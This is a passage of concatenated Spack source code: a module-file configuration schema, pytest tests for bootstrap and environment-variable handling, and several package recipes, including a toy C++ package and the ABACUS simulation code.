r'blacklist|projections|naming_scheme|core_compilers|all|' \
r'defaults)(^\w[\w-]*)'
#: Matches a valid name for a module set
valid_module_set_name = r'^(?!arch_folder$|lmod$|roots$|enable$|prefix_inspections$|'\
r'tcl$|use_view$)\w[\w-]*$'
#: Matches an anonymous spec, i.e. a spec without a root name
anonymous_spec_regex = r'^[\^@%+~]'
#: Definitions for parts of module schema
array_of_strings = {
'type': 'array', 'default': [], 'items': {'type': 'string'}
}
dictionary_of_strings = {
'type': 'object', 'patternProperties': {r'\w[\w-]*': {'type': 'string'}}
}
dependency_selection = {'type': 'string', 'enum': ['none', 'direct', 'all']}
module_file_configuration = {
'type': 'object',
'default': {},
'additionalProperties': False,
'properties': {
'filter': {
'type': 'object',
'default': {},
'additionalProperties': False,
'properties': {
'environment_blacklist': {
'type': 'array',
'default': [],
'items': {
'type': 'string'
}
}
}
},
'template': {
'type': 'string'
},
'autoload': dependency_selection,
'prerequisites': dependency_selection,
'conflict': array_of_strings,
'load': array_of_strings,
'suffixes': {
'type': 'object',
'validate_spec': True,
'patternProperties': {
r'\w[\w-]*': { # key
'type': 'string'
}
}
},
'environment': spack.schema.environment.definition
}
}
projections_scheme = spack.schema.projections.properties['projections']
module_type_configuration = {
'type': 'object',
'default': {},
'allOf': [
{'properties': {
'verbose': {
'type': 'boolean',
'default': False
},
'hash_length': {
'type': 'integer',
'minimum': 0,
'default': 7
},
'whitelist': array_of_strings,
'blacklist': array_of_strings,
'blacklist_implicits': {
'type': 'boolean',
'default': False
},
'defaults': array_of_strings,
'naming_scheme': {
'type': 'string' # Can we be more specific here?
},
'projections': projections_scheme,
'all': module_file_configuration,
}
},
{'validate_spec': True,
'patternProperties': {
spec_regex: module_file_configuration,
anonymous_spec_regex: module_file_configuration,
}
}
]
}
module_config_properties = {
'use_view': {'anyOf': [
{'type': 'string'},
{'type': 'boolean'}
]},
'arch_folder': {'type': 'boolean'},
'roots': {
'type': 'object',
'properties': {
'tcl': {'type': 'string'},
'lmod': {'type': 'string'},
},
},
'enable': {
'type': 'array',
'default': [],
'items': {
'type': 'string',
'enum': ['tcl', 'lmod']
}
},
'lmod': {
'allOf': [
# Base configuration
module_type_configuration,
{
'type': 'object',
'properties': {
'core_compilers': array_of_strings,
'hierarchy': array_of_strings,
'core_specs': array_of_strings,
},
} # Specific lmod extensions
]
},
'tcl': {
'allOf': [
# Base configuration
module_type_configuration,
{} # Specific tcl extensions
]
},
'prefix_inspections': {
'type': 'object',
'additionalProperties': False,
'patternProperties': {
# prefix-relative path to be inspected for existence
r'^[\w-]*': array_of_strings
}
},
}
def deprecation_msg_default_module_set(instance, props):
return (
'Top-level properties "{0}" in module config are ignored as of Spack v0.18. '
'They should be set on the "default" module set. Run\n\n'
'\t$ spack config update modules\n\n'
'to update the file to the new format'.format('", "'.join(instance))
)
# Properties for inclusion into other schemas (requires definitions)
properties = {
'modules': {
'type': 'object',
'additionalProperties': False,
'properties': {
'prefix_inspections': {
'type': 'object',
'additionalProperties': False,
'patternProperties': {
# prefix-relative path to be inspected for existence
r'^[\w-]*': array_of_strings
}
},
},
'patternProperties': {
valid_module_set_name: {
'type': 'object',
'default': {},
'additionalProperties': False,
'properties': module_config_properties
},
# Deprecated top-level keys (ignored in 0.18 with a warning)
'^(arch_folder|lmod|roots|enable|tcl|use_view)$': {}
},
'deprecatedProperties': {
'properties': ['arch_folder', 'lmod', 'roots', 'enable', 'tcl', 'use_view'],
'message': deprecation_msg_default_module_set,
'error': False
}
}
}
#: Full schema with metadata
schema = {
'$schema': 'http://json-schema.org/draft-07/schema#',
'title': 'Spack module file configuration file schema',
'type': 'object',
'additionalProperties': False,
'properties': properties,
}
def update(data):
"""Update the data in place to remove deprecated properties.
Args:
data (dict): dictionary to be updated
Returns:
True if data was changed, False otherwise
"""
changed = False
deprecated_top_level_keys = ('arch_folder', 'lmod', 'roots', 'enable',
'tcl', 'use_view')
# Don't update when we already have a default module set
if 'default' in data:
if any(key in data for key in deprecated_top_level_keys):
warnings.warn('Did not move top-level module properties into "default" '
'module set, because the "default" module set is already '
'defined')
return changed
default = {}
# Move deprecated top-level keys under "default" module set.
for key in deprecated_top_level_keys:
if key in data:
default[key] = data.pop(key)
if default:
changed = True
data['default'] = default
return changed
```
#### File: test/cmd/bootstrap.py
```python
import os.path
import sys
import pytest
import spack.config
import spack.environment as ev
import spack.main
import spack.mirror
from spack.util.path import convert_to_posix_path
_bootstrap = spack.main.SpackCommand('bootstrap')
@pytest.mark.parametrize('scope', [
None, 'site', 'system', 'user'
])
def test_enable_and_disable(mutable_config, scope):
scope_args = []
if scope:
scope_args = ['--scope={0}'.format(scope)]
_bootstrap('enable', *scope_args)
assert spack.config.get('bootstrap:enable', scope=scope) is True
_bootstrap('disable', *scope_args)
assert spack.config.get('bootstrap:enable', scope=scope) is False
@pytest.mark.parametrize('scope', [
None, 'site', 'system', 'user'
])
def test_root_get_and_set(mutable_config, scope):
scope_args, path = [], '/scratch/spack/bootstrap'
if scope:
scope_args = ['--scope={0}'.format(scope)]
_bootstrap('root', path, *scope_args)
out = _bootstrap('root', *scope_args, output=str)
if sys.platform == 'win32':
out = convert_to_posix_path(out)
assert out.strip() == path
@pytest.mark.parametrize('scopes', [
('site',),
('system', 'user')
])
def test_reset_in_file_scopes(mutable_config, scopes):
# Assert files are created in the right scopes
bootstrap_yaml_files = []
for s in scopes:
_bootstrap('disable', '--scope={0}'.format(s))
scope_path = spack.config.config.scopes[s].path
bootstrap_yaml = os.path.join(
scope_path, 'bootstrap.yaml'
)
assert os.path.exists(bootstrap_yaml)
bootstrap_yaml_files.append(bootstrap_yaml)
_bootstrap('reset', '-y')
for bootstrap_yaml in bootstrap_yaml_files:
assert not os.path.exists(bootstrap_yaml)
def test_reset_in_environment(mutable_mock_env_path, mutable_config):
env = spack.main.SpackCommand('env')
env('create', 'bootstrap-test')
current_environment = ev.read('bootstrap-test')
with current_environment:
_bootstrap('disable')
assert spack.config.get('bootstrap:enable') is False
_bootstrap('reset', '-y')
# We have no default settings in tests
assert spack.config.get('bootstrap:enable') is None
# Check that reset didn't delete the entire file
spack_yaml = os.path.join(current_environment.path, 'spack.yaml')
assert os.path.exists(spack_yaml)
def test_reset_in_file_scopes_overwrites_backup_files(mutable_config):
# Create a bootstrap.yaml with some config
_bootstrap('disable', '--scope=site')
scope_path = spack.config.config.scopes['site'].path
bootstrap_yaml = os.path.join(scope_path, 'bootstrap.yaml')
assert os.path.exists(bootstrap_yaml)
# Reset the bootstrap configuration
_bootstrap('reset', '-y')
backup_file = bootstrap_yaml + '.bkp'
assert not os.path.exists(bootstrap_yaml)
assert os.path.exists(backup_file)
# Iterate another time
_bootstrap('disable', '--scope=site')
assert os.path.exists(bootstrap_yaml)
assert os.path.exists(backup_file)
_bootstrap('reset', '-y')
assert not os.path.exists(bootstrap_yaml)
assert os.path.exists(backup_file)
def test_list_sources(capsys):
# Get the merged list and ensure we get our defaults
with capsys.disabled():
output = _bootstrap('list')
assert "github-actions" in output
# Ask for a specific scope and check that the list of sources is empty
with capsys.disabled():
output = _bootstrap('list', '--scope', 'user')
assert "No method available" in output
@pytest.mark.parametrize('command,value', [
('trust', True),
('untrust', False)
])
def test_trust_or_untrust_sources(mutable_config, command, value):
key = 'bootstrap:trusted:github-actions'
trusted = spack.config.get(key, default=None)
assert trusted is None
_bootstrap(command, 'github-actions')
trusted = spack.config.get(key, default=None)
assert trusted is value
def test_trust_or_untrust_fails_with_no_method(mutable_config):
with pytest.raises(RuntimeError, match='no bootstrapping method'):
_bootstrap('trust', 'foo')
def test_trust_or_untrust_fails_with_more_than_one_method(mutable_config):
wrong_config = {'sources': [
{'name': 'github-actions',
'metadata': '$spack/share/spack/bootstrap/github-actions'},
{'name': 'github-actions',
'metadata': '$spack/share/spack/bootstrap/github-actions'}],
'trusted': {}
}
with spack.config.override('bootstrap', wrong_config):
with pytest.raises(RuntimeError, match='more than one'):
_bootstrap('trust', 'github-actions')
@pytest.mark.parametrize('use_existing_dir', [True, False])
def test_add_failures_for_non_existing_files(mutable_config, tmpdir, use_existing_dir):
metadata_dir = str(tmpdir) if use_existing_dir else '/foo/doesnotexist'
with pytest.raises(RuntimeError, match='does not exist'):
_bootstrap('add', 'mock-mirror', metadata_dir)
def test_add_failures_for_already_existing_name(mutable_config):
with pytest.raises(RuntimeError, match='already exist'):
_bootstrap('add', 'github-actions', 'some-place')
def test_remove_failure_for_non_existing_names(mutable_config):
with pytest.raises(RuntimeError, match='cannot find'):
_bootstrap('remove', 'mock-mirror')
def test_remove_and_add_a_source(mutable_config):
# Check we start with a single bootstrapping source
sources = spack.bootstrap.bootstrapping_sources()
assert len(sources) == 1
# Remove it and check the result
_bootstrap('remove', 'github-actions')
sources = spack.bootstrap.bootstrapping_sources()
assert not sources
# Add it back and check we restored the initial state
_bootstrap(
'add', 'github-actions', '$spack/share/spack/bootstrap/github-actions-v0.2'
)
sources = spack.bootstrap.bootstrapping_sources()
assert len(sources) == 1
@pytest.mark.maybeslow
@pytest.mark.skipif(sys.platform == 'win32', reason="Not supported on Windows (yet)")
def test_bootstrap_mirror_metadata(mutable_config, linux_os, monkeypatch, tmpdir):
"""Test that `spack bootstrap mirror` creates a folder that can be ingested by
`spack bootstrap add`. Here we don't download data, since that would be an
expensive operation for a unit test.
"""
old_create = spack.mirror.create
monkeypatch.setattr(spack.mirror, 'create', lambda p, s: old_create(p, []))
# Create the mirror in a temporary folder
compilers = [{
'compiler': {
'spec': '[email protected]',
'operating_system': '{0.name}{0.version}'.format(linux_os),
'modules': [],
'paths': {
'cc': '/usr/bin',
'cxx': '/usr/bin',
'fc': '/usr/bin',
'f77': '/usr/bin'
}
}
}]
with spack.config.override('compilers', compilers):
_bootstrap('mirror', str(tmpdir))
# Register the mirror
metadata_dir = tmpdir.join('metadata', 'sources')
_bootstrap('add', '--trust', 'test-mirror', str(metadata_dir))
assert _bootstrap.returncode == 0
assert any(m['name'] == 'test-mirror'
for m in spack.bootstrap.bootstrapping_sources())
```
#### File: spack/test/environment_modifications.py
```python
import os
import sys
import pytest
import spack.util.environment as environment
from spack.paths import spack_root
from spack.util.environment import (
AppendPath,
EnvironmentModifications,
PrependPath,
RemovePath,
SetEnv,
UnsetEnv,
filter_system_paths,
is_system_path,
)
datadir = os.path.join(spack_root, 'lib', 'spack', 'spack', 'test', 'data')
def test_inspect_path(tmpdir):
inspections = {
'bin': ['PATH'],
'man': ['MANPATH'],
'share/man': ['MANPATH'],
'share/aclocal': ['ACLOCAL_PATH'],
'lib': ['LIBRARY_PATH', 'LD_LIBRARY_PATH'],
'lib64': ['LIBRARY_PATH', 'LD_LIBRARY_PATH'],
'include': ['CPATH'],
'lib/pkgconfig': ['PKG_CONFIG_PATH'],
'lib64/pkgconfig': ['PKG_CONFIG_PATH'],
'share/pkgconfig': ['PKG_CONFIG_PATH'],
'': ['CMAKE_PREFIX_PATH']
}
tmpdir.mkdir('bin')
tmpdir.mkdir('lib')
tmpdir.mkdir('include')
env = environment.inspect_path(str(tmpdir), inspections)
names = [item.name for item in env]
assert 'PATH' in names
assert 'LIBRARY_PATH' in names
assert 'LD_LIBRARY_PATH' in names
assert 'CPATH' in names
def test_exclude_paths_from_inspection():
inspections = {
'lib': ['LIBRARY_PATH', 'LD_LIBRARY_PATH'],
'lib64': ['LIBRARY_PATH', 'LD_LIBRARY_PATH'],
'include': ['CPATH']
}
env = environment.inspect_path(
'/usr', inspections, exclude=is_system_path
)
assert len(env) == 0
@pytest.fixture()
def prepare_environment_for_tests(working_env):
"""Sets a few dummy variables in the current environment, that will be
useful for the tests below.
"""
os.environ['UNSET_ME'] = 'foo'
os.environ['EMPTY_PATH_LIST'] = ''
os.environ['PATH_LIST'] = '/path/second:/path/third'
os.environ['REMOVE_PATH_LIST'] \
= '/a/b:/duplicate:/a/c:/remove/this:/a/d:/duplicate/:/f/g'
os.environ['PATH_LIST_WITH_SYSTEM_PATHS'] \
= '/usr/include:' + os.environ['REMOVE_PATH_LIST']
os.environ['PATH_LIST_WITH_DUPLICATES'] = os.environ['REMOVE_PATH_LIST']
@pytest.fixture
def env(prepare_environment_for_tests):
"""Returns an empty EnvironmentModifications object."""
return EnvironmentModifications()
@pytest.fixture
def miscellaneous_paths():
"""Returns a list of paths, including system ones."""
return [
'/usr/local/Cellar/gcc/5.3.0/lib',
'/usr/local/lib',
'/usr/local',
'/usr/local/include',
'/usr/local/lib64',
'/usr/local/opt/some-package/lib',
'/usr/opt/lib',
'/usr/local/../bin',
'/lib',
'/',
'/usr',
'/usr/',
'/usr/bin',
'/bin64',
'/lib64',
'/include',
'/include/',
'/opt/some-package/include',
'/opt/some-package/local/..',
]
@pytest.fixture
def files_to_be_sourced():
"""Returns a list of files to be sourced"""
return [
os.path.join(datadir, 'sourceme_first.sh'),
os.path.join(datadir, 'sourceme_second.sh'),
os.path.join(datadir, 'sourceme_parameters.sh'),
os.path.join(datadir, 'sourceme_unicode.sh')
]
def test_set(env):
"""Tests setting values in the environment."""
# Here we are storing the commands to set a couple of variables
env.set('A', 'dummy value')
env.set('B', 3)
# ...and then we are executing them
env.apply_modifications()
assert 'dummy value' == os.environ['A']
assert str(3) == os.environ['B']
def test_append_flags(env):
"""Tests appending to a value in the environment."""
# Store a couple of commands
env.append_flags('APPEND_TO_ME', 'flag1')
env.append_flags('APPEND_TO_ME', 'flag2')
# ... execute the commands
env.apply_modifications()
assert 'flag1 flag2' == os.environ['APPEND_TO_ME']
def test_unset(env):
"""Tests unsetting values in the environment."""
# Assert that the target variable is there and unset it
assert 'foo' == os.environ['UNSET_ME']
env.unset('UNSET_ME')
env.apply_modifications()
# Trying to retrieve is after deletion should cause a KeyError
with pytest.raises(KeyError):
os.environ['UNSET_ME']
@pytest.mark.skipif(sys.platform == 'win32',
reason="Not supported on Windows (yet)")
def test_filter_system_paths(miscellaneous_paths):
"""Tests that the filtering of system paths works as expected."""
filtered = filter_system_paths(miscellaneous_paths)
expected = [
'/usr/local/Cellar/gcc/5.3.0/lib',
'/usr/local/opt/some-package/lib',
'/usr/opt/lib',
'/opt/some-package/include',
'/opt/some-package/local/..',
]
assert filtered == expected
# TODO 27021
@pytest.mark.skipif(sys.platform == 'win32',
reason="Not supported on Windows (yet)")
def test_set_path(env):
"""Tests setting paths in an environment variable."""
# Check setting paths with the default separator
env.set_path('A', ['foo', 'bar', 'baz'])
env.apply_modifications()
assert 'foo:bar:baz' == os.environ['A']
env.set_path('B', ['foo', 'bar', 'baz'], separator=';')
env.apply_modifications()
assert 'foo;bar;baz' == os.environ['B']
@pytest.mark.skipif(sys.platform == 'win32',
reason="Not supported on Windows (yet)")
def test_path_manipulation(env):
"""Tests manipulating list of paths in the environment."""
env.append_path('PATH_LIST', '/path/last')
env.prepend_path('PATH_LIST', '/path/first')
env.append_path('EMPTY_PATH_LIST', '/path/middle')
env.append_path('EMPTY_PATH_LIST', '/path/last')
env.prepend_path('EMPTY_PATH_LIST', '/path/first')
env.append_path('NEWLY_CREATED_PATH_LIST', '/path/middle')
env.append_path('NEWLY_CREATED_PATH_LIST', '/path/last')
env.prepend_path('NEWLY_CREATED_PATH_LIST', '/path/first')
env.remove_path('REMOVE_PATH_LIST', '/remove/this')
env.remove_path('REMOVE_PATH_LIST', '/duplicate/')
env.deprioritize_system_paths('PATH_LIST_WITH_SYSTEM_PATHS')
env.prune_duplicate_paths('PATH_LIST_WITH_DUPLICATES')
env.apply_modifications()
expected = '/path/first:/path/second:/path/third:/path/last'
assert os.environ['PATH_LIST'] == expected
expected = '/path/first:/path/middle:/path/last'
assert os.environ['EMPTY_PATH_LIST'] == expected
expected = '/path/first:/path/middle:/path/last'
assert os.environ['NEWLY_CREATED_PATH_LIST'] == expected
assert os.environ['REMOVE_PATH_LIST'] == '/a/b:/a/c:/a/d:/f/g'
assert not os.environ['PATH_LIST_WITH_SYSTEM_PATHS'].\
startswith('/usr/include:')
assert os.environ['PATH_LIST_WITH_SYSTEM_PATHS'].endswith(':/usr/include')
assert os.environ['PATH_LIST_WITH_DUPLICATES'].count('/duplicate') == 1
def test_extra_arguments(env):
"""Tests that we can attach extra arguments to any command."""
env.set('A', 'dummy value', who='Pkg1')
for x in env:
assert 'who' in x.args
env.apply_modifications()
assert 'dummy value' == os.environ['A']
def test_extend(env):
"""Tests that we can construct a list of environment modifications
starting from another list.
"""
env.set('A', 'dummy value')
env.set('B', 3)
copy_construct = EnvironmentModifications(env)
assert len(copy_construct) == 2
for x, y in zip(env, copy_construct):
assert x is y
@pytest.mark.skipif(sys.platform == 'win32',
reason="Not supported on Windows (yet)")
@pytest.mark.usefixtures('prepare_environment_for_tests')
def test_source_files(files_to_be_sourced):
"""Tests the construction of a list of environment modifications that are
the result of sourcing a file.
"""
env = EnvironmentModifications()
for filename in files_to_be_sourced:
if filename.endswith('sourceme_parameters.sh'):
env.extend(EnvironmentModifications.from_sourcing_file(
filename, 'intel64'))
else:
env.extend(EnvironmentModifications.from_sourcing_file(filename))
modifications = env.group_by_name()
# This is sensitive to the user's environment; can include
# spurious entries for things like PS1
#
# TODO: figure out how to make a bit more robust.
assert len(modifications) >= 5
# Set new variables
assert len(modifications['NEW_VAR']) == 1
assert isinstance(modifications['NEW_VAR'][0], SetEnv)
assert modifications['NEW_VAR'][0].value == 'new'
assert len(modifications['FOO']) == 1
assert isinstance(modifications['FOO'][0], SetEnv)
assert modifications['FOO'][0].value == 'intel64'
# Unset variables
assert len(modifications['EMPTY_PATH_LIST']) == 1
assert isinstance(modifications['EMPTY_PATH_LIST'][0], UnsetEnv)
# Modified variables
assert len(modifications['UNSET_ME']) == 1
assert isinstance(modifications['UNSET_ME'][0], SetEnv)
assert modifications['UNSET_ME'][0].value == 'overridden'
assert len(modifications['PATH_LIST']) == 3
assert isinstance(modifications['PATH_LIST'][0], RemovePath)
assert modifications['PATH_LIST'][0].value == '/path/third'
assert isinstance(modifications['PATH_LIST'][1], AppendPath)
assert modifications['PATH_LIST'][1].value == '/path/fourth'
assert isinstance(modifications['PATH_LIST'][2], PrependPath)
assert modifications['PATH_LIST'][2].value == '/path/first'
@pytest.mark.regression('8345')
def test_preserve_environment(prepare_environment_for_tests):
# UNSET_ME is defined, and will be unset in the context manager,
# NOT_SET is not in the environment and will be set within the
# context manager, PATH_LIST is set and will be changed.
with environment.preserve_environment('UNSET_ME', 'NOT_SET', 'PATH_LIST'):
os.environ['NOT_SET'] = 'a'
assert os.environ['NOT_SET'] == 'a'
del os.environ['UNSET_ME']
assert 'UNSET_ME' not in os.environ
os.environ['PATH_LIST'] = 'changed'
assert 'NOT_SET' not in os.environ
assert os.environ['UNSET_ME'] == 'foo'
assert os.environ['PATH_LIST'] == '/path/second:/path/third'
@pytest.mark.skipif(sys.platform == 'win32',
reason="Not supported on Windows (yet)")
@pytest.mark.parametrize('files,expected,deleted', [
# Sets two variables
((os.path.join(datadir, 'sourceme_first.sh'),),
{'NEW_VAR': 'new', 'UNSET_ME': 'overridden'}, []),
# Check if we can set a variable to different values depending
# on command line parameters
((os.path.join(datadir, 'sourceme_parameters.sh'),),
{'FOO': 'default'}, []),
(([os.path.join(datadir, 'sourceme_parameters.sh'), 'intel64'],),
{'FOO': 'intel64'}, []),
# Check unsetting variables
((os.path.join(datadir, 'sourceme_second.sh'),),
{'PATH_LIST': '/path/first:/path/second:/path/fourth'},
['EMPTY_PATH_LIST']),
# Check that order of sourcing matters
((os.path.join(datadir, 'sourceme_unset.sh'),
os.path.join(datadir, 'sourceme_first.sh')),
{'NEW_VAR': 'new', 'UNSET_ME': 'overridden'}, []),
((os.path.join(datadir, 'sourceme_first.sh'),
os.path.join(datadir, 'sourceme_unset.sh')),
{'NEW_VAR': 'new'}, ['UNSET_ME']),
])
@pytest.mark.usefixtures('prepare_environment_for_tests')
def test_environment_from_sourcing_files(files, expected, deleted):
env = environment.environment_after_sourcing_files(*files)
# Test that variables that have been modified are still there and contain
# the expected output
for name, value in expected.items():
assert name in env
assert value in env[name]
# Test that variables that have been unset are not there
for name in deleted:
assert name not in env
def test_clear(env):
env.set('A', 'dummy value')
assert len(env) > 0
env.clear()
assert len(env) == 0
@pytest.mark.parametrize('env,blacklist,whitelist', [
# Check we can blacklist a literal
({'SHLVL': '1'}, ['SHLVL'], []),
# Check whitelist takes precedence
({'SHLVL': '1'}, ['SHLVL'], ['SHLVL']),
])
def test_sanitize_literals(env, blacklist, whitelist):
after = environment.sanitize(env, blacklist, whitelist)
# Check that all the whitelisted variables are there
assert all(x in after for x in whitelist)
# Check that the blacklisted variables that are not
# whitelisted are there
blacklist = list(set(blacklist) - set(whitelist))
assert all(x not in after for x in blacklist)
@pytest.mark.parametrize('env,blacklist,whitelist,expected,deleted', [
# Check we can blacklist using a regex
({'SHLVL': '1'}, ['SH.*'], [], [], ['SHLVL']),
# Check we can whitelist using a regex
({'SHLVL': '1'}, ['SH.*'], ['SH.*'], ['SHLVL'], []),
# Check regex to blacklist Modules v4 related vars
({'MODULES_LMALTNAME': '1', 'MODULES_LMCONFLICT': '2'},
['MODULES_(.*)'], [], [], ['MODULES_LMALTNAME', 'MODULES_LMCONFLICT']),
({'A_modquar': '1', 'b_modquar': '2', 'C_modshare': '3'},
[r'(\w*)_mod(quar|share)'], [], [],
['A_modquar', 'b_modquar', 'C_modshare']),
])
def test_sanitize_regex(env, blacklist, whitelist, expected, deleted):
after = environment.sanitize(env, blacklist, whitelist)
assert all(x in after for x in expected)
assert all(x not in after for x in deleted)
@pytest.mark.regression('12085')
@pytest.mark.parametrize('before,after,search_list', [
# Set environment variables
({}, {'FOO': 'foo'}, [environment.SetEnv('FOO', 'foo')]),
# Unset environment variables
({'FOO': 'foo'}, {}, [environment.UnsetEnv('FOO')]),
# Append paths to an environment variable
({'FOO_PATH': '/a/path'}, {'FOO_PATH': '/a/path:/b/path'},
[environment.AppendPath('FOO_PATH', '/b/path')]),
({}, {'FOO_PATH': '/a/path' + os.sep + '/b/path'}, [
environment.AppendPath('FOO_PATH', '/a/path' + os.sep + '/b/path')
]),
({'FOO_PATH': '/a/path:/b/path'}, {'FOO_PATH': '/b/path'}, [
environment.RemovePath('FOO_PATH', '/a/path')
]),
({'FOO_PATH': '/a/path:/b/path'}, {'FOO_PATH': '/a/path:/c/path'}, [
environment.RemovePath('FOO_PATH', '/b/path'),
environment.AppendPath('FOO_PATH', '/c/path')
]),
({'FOO_PATH': '/a/path:/b/path'}, {'FOO_PATH': '/c/path:/a/path'}, [
environment.RemovePath('FOO_PATH', '/b/path'),
environment.PrependPath('FOO_PATH', '/c/path')
]),
# Modify two variables in the same environment
({'FOO': 'foo', 'BAR': 'bar'}, {'FOO': 'baz', 'BAR': 'baz'}, [
environment.SetEnv('FOO', 'baz'),
environment.SetEnv('BAR', 'baz'),
]),
])
def test_from_environment_diff(before, after, search_list):
mod = environment.EnvironmentModifications.from_environment_diff(
before, after
)
for item in search_list:
assert item in mod
@pytest.mark.skipif(sys.platform == 'win32',
reason="LMod not supported on Windows")
@pytest.mark.regression('15775')
def test_blacklist_lmod_variables():
# Construct the list of environment modifications
file = os.path.join(datadir, 'sourceme_lmod.sh')
env = EnvironmentModifications.from_sourcing_file(file)
# Check that variables related to lmod are not in there
modifications = env.group_by_name()
assert not any(x.startswith('LMOD_') for x in modifications)
```
#### File: packages/gnuconfig/package.py
```python
import os
from spack.package import *
class Gnuconfig(Package):
"""
The GNU config.guess and config.sub scripts versioned by timestamp.
This package can be used as a build dependency for autotools packages that
ship a tarball with outdated config.guess and config.sub files.
"""
has_code = False
version('2021-08-14')
def install(self, spec, prefix):
config_sub = join_path(prefix, 'config.sub')
config_guess = join_path(prefix, 'config.guess')
# Create files
with open(config_sub, 'w') as f:
f.write("#!/bin/sh\necho gnuconfig version of config.sub")
with open(config_guess, 'w') as f:
f.write("#!/bin/sh\necho gnuconfig version of config.guess")
# Make executable
os.chmod(config_sub, 0o775)
os.chmod(config_guess, 0o775)
```
#### File: packages/quux/package.py
```python
import os
import sys
from spack.package import *
class Quux(Package):
"""Toy package for testing dependencies"""
homepage = "https://www.example.com"
has_code = False
version('3.0.0')
depends_on('garply')
def install(self, spec, prefix):
quux_cc = '''#include "quux.h"
#include "garply/garply.h"
#include "quux_version.h"
#include <iostream>
#include <stdexcept>
const int Quux::version_major = quux_version_major;
const int Quux::version_minor = quux_version_minor;
Quux::Quux() {}
int
Quux::get_version() const
{
return 10 * version_major + version_minor;
}
int
Quux::quuxify() const
{
int quux_version = get_version();
std::cout << "Quux::quuxify version " << quux_version
<< " invoked" <<std::endl;
std::cout << "Quux config directory is %s" <<std::endl;
Garply garply;
int garply_version = garply.garplinate();
if (garply_version != quux_version) {
throw std::runtime_error(
"Quux found an incompatible version of Garply.");
}
return quux_version;
}
'''
quux_h = '''#ifndef QUUX_H_
class Quux
{
private:
static const int version_major;
static const int version_minor;
public:
Quux();
int get_version() const;
int quuxify() const;
};
#endif // QUUX_H_
'''
quuxifier_cc = '''
#include "quux.h"
#include <iostream>
int
main()
{
Quux quux;
quux.quuxify();
return 0;
}
'''
quux_version_h = '''const int quux_version_major = %s;
const int quux_version_minor = %s;
'''
mkdirp('%s/quux' % prefix.include)
mkdirp('%s/quux' % self.stage.source_path)
with open('%s/quux_version.h' % self.stage.source_path, 'w') as f:
f.write(quux_version_h % (self.version[0], self.version[1:]))
with open('%s/quux/quux.cc' % self.stage.source_path, 'w') as f:
f.write(quux_cc % (prefix.config))
with open('%s/quux/quux.h' % self.stage.source_path, 'w') as f:
f.write(quux_h)
with open('%s/quux/quuxifier.cc' % self.stage.source_path, 'w') as f:
f.write(quuxifier_cc)
gpp = which('/usr/bin/g++')
if sys.platform == 'darwin':
gpp = which('/usr/bin/clang++')
gpp('-Dquux_EXPORTS',
'-I%s' % self.stage.source_path,
'-I%s' % spec['garply'].prefix.include,
'-O2', '-g', '-DNDEBUG', '-fPIC',
'-o', 'quux.cc.o',
'-c', 'quux/quux.cc')
gpp('-Dquux_EXPORTS',
'-I%s' % self.stage.source_path,
'-I%s' % spec['garply'].prefix.include,
'-O2', '-g', '-DNDEBUG', '-fPIC',
'-o', 'quuxifier.cc.o',
'-c', 'quux/quuxifier.cc')
if sys.platform == 'darwin':
gpp('-fPIC', '-O2', '-g', '-DNDEBUG',
'-dynamiclib', '-Wl,-headerpad_max_install_names',
'-o', 'libquux.dylib',
'-install_name', '@rpath/libcorge.dylib',
'quux.cc.o', '-Wl,-rpath,%s' % prefix.lib64,
'-Wl,-rpath,%s' % spec['garply'].prefix.lib64,
'%s/libgarply.dylib' % spec['garply'].prefix.lib64)
gpp('-O2', '-g', '-DNDEBUG',
'quuxifier.cc.o', '-o', 'quuxifier',
'-Wl,-rpath,%s' % prefix.lib64,
'-Wl,-rpath,%s' % spec['garply'].prefix.lib64,
'libquux.dylib',
'%s/libgarply.dylib' % spec['garply'].prefix.lib64)
mkdirp(prefix.lib64)
copy('libquux.dylib', '%s/libquux.dylib' % prefix.lib64)
os.link('%s/libquux.dylib' % prefix.lib64,
'%s/libquux.dylib.3.0' % prefix.lib64)
else:
gpp('-fPIC', '-O2', '-g', '-DNDEBUG', '-shared',
'-Wl,-soname,libquux.so', '-o', 'libquux.so', 'quux.cc.o',
'-Wl,-rpath,%s:%s::::' % (prefix.lib64,
spec['garply'].prefix.lib64),
'%s/libgarply.so' % spec['garply'].prefix.lib64)
gpp('-O2', '-g', '-DNDEBUG', '-rdynamic',
'quuxifier.cc.o', '-o', 'quuxifier',
'-Wl,-rpath,%s:%s::::' % (prefix.lib64,
spec['garply'].prefix.lib64),
'libquux.so',
'%s/libgarply.so' % spec['garply'].prefix.lib64)
mkdirp(prefix.lib64)
copy('libquux.so', '%s/libquux.so' % prefix.lib64)
os.link('%s/libquux.so' % prefix.lib64,
'%s/libquux.so.3.0' % prefix.lib64)
copy('quuxifier', '%s/quuxifier' % prefix.lib64)
copy('%s/quux/quux.h' % self.stage.source_path,
'%s/quux/quux.h' % prefix.include)
mkdirp(prefix.bin)
copy('quux_version.h', '%s/quux_version.h' % prefix.bin)
os.symlink('%s/quuxifier' % prefix.lib64, '%s/quuxifier' % prefix.bin)
os.symlink('%s/garplinator' % spec['garply'].prefix.lib64,
'%s/garplinator' % prefix.bin)
```
#### File: packages/test-install-callbacks/package.py
```python
from spack.package import *
from spack.package_base import run_after
class TestInstallCallbacks(Package):
"""This package illustrates install callback test failure."""
homepage = "http://www.example.com/test-install-callbacks"
url = "http://www.test-failure.test/test-install-callbacks-1.0.tar.gz"
version('1.0', '0123456789abcdef0123456789abcdef')
# Include an undefined callback method
install_time_test_callbacks = ['undefined-install-test', 'test']
run_after('install')(Package._run_default_install_time_test_callbacks)
def install(self, spec, prefix):
mkdirp(prefix.bin)
def test(self):
print('test: test-install-callbacks')
print('PASSED')
```
#### File: packages/abacus/package.py
```python
import re
from spack.package import *
class Abacus(MakefilePackage):
"""ABACUS (Atomic-orbital Based Ab-initio Computation at UStc)
is an open-source computer code package aiming
for large-scale electronic-structure simulations
from first principles"""
maintainers = ["bitllion"]
homepage = "http://abacus.ustc.edu.cn/"
git = "https://github.com/abacusmodeling/abacus-develop.git"
url = "https://github.com/abacusmodeling/abacus-develop/archive/refs/tags/v2.2.1.tar.gz"
version("develop", branch="develop")
version(
"2.2.3",
sha256="88dbf6a3bdd907df3e097637ec8e51fde13e2f5e0b44f3667443195481320edf",
)
version(
"2.2.2",
sha256="4a7cf2ec6e43dd5c53d5f877a941367074f4714d93c1977a719782957916169e",
)
version(
"2.2.1",
sha256="14feca1d8d1ce025d3f263b85ebfbebc1a1efff704b6490e95b07603c55c1d63",
)
version(
"2.2.0",
sha256="09d4a2508d903121d29813a85791eeb3a905acbe1c5664b8a88903f8eda64b8f",
)
